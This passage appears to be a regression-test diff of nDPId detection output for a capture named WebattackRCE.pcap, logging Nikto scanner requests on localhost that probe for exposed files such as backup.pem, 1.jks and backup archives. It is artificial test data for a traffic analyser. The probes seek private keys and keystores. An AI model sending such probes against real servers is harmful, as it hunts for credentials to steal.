00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1576420276937,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276937,"pkt":"AAAAAAAAAAAAAAAACABFAADK9XZAAEAGRrV\/AAABfwAAAcLgH5B7eM0nuPdDlYAYAED+vgAAAQEICp1m+\/GdZvvxR0VUIC8xMjcuMC4wLjEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276937,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276937,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276938,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1576420276938,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276938,"pkt":"AAAAAAAAAAAAAAAACABFAADFaYFAAEAG0q9\/AAABfwAAAcLiH5DjU1EuPo0KHoAYAED+uQAAAQEICp1m+\/KdZvvyR0VUIC8xMjcuMC4wLjEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276938,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276938,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276939,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1576420276939,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276939,"pkt":"AAAAAAAAAAAAAAAACABFAADFJ3BAAEAGFMF\/AAABfwAAAcLkH5B8NB8+Bh651YAYAED+uQAAAQEICp1m+\/OdZvvzR0VUIC8xMjcuMC4wLjEuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276939,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276939,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276941,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1576420276941,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276941,"pkt":"AAAAAAAAAAAAAAAACABFAADCOKZAAEAGA45\/AAABfwAAAcLmH5ActAD4h3K22IAYAED+tgAAAQEICp1m+\/WdZvv1R0VUIC9iYWNrdXAucGVtIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276941,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276941,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276943,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1576420276943,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276943,"pkt":"AAAAAAAAAAAAAAAACABFAADCuRhAAEAGgxt\/AAABfwAAAcLoH5DBbYFGICWC9IAYAED+tgAAAQEICp1m+\/edZvv3R0VUIC9iYWNrdXAucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276943,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276943,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276945,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1576420276945,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276945,"pkt":"AAAAAAAAAAAAAAAACABFAAC9GW5AAEAGIst\/AAABfwAAAcLqH5C0ISE5HkW76YAYAED+sQAAAQEICp1m+\/mdZvv5R0VUIC8xLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276945,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276945,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276947,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1576420276947,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276947,"pkt":"AAAAAAAAAAAAAAAACABFAAC9hilAAEAGtg9\/AAABfwAAAcLsH5DmS75z\/EZQIIAYAED+sQAAAQEICp1m+\/udZvv7R0VUIC8xLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276947,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276947,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276949,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1576420276949,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276949,"pkt":"AAAAAAAAAAAAAAAACABFAADG8sFAAEAGSW5\/AAABfwAAAcLuH5DZeMrrTWBmVIAYAED+ugAAAQEICp1m+\/2dZvv9R0VUIC8xMjcwMC50YXIubHptYSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276949,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276949,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 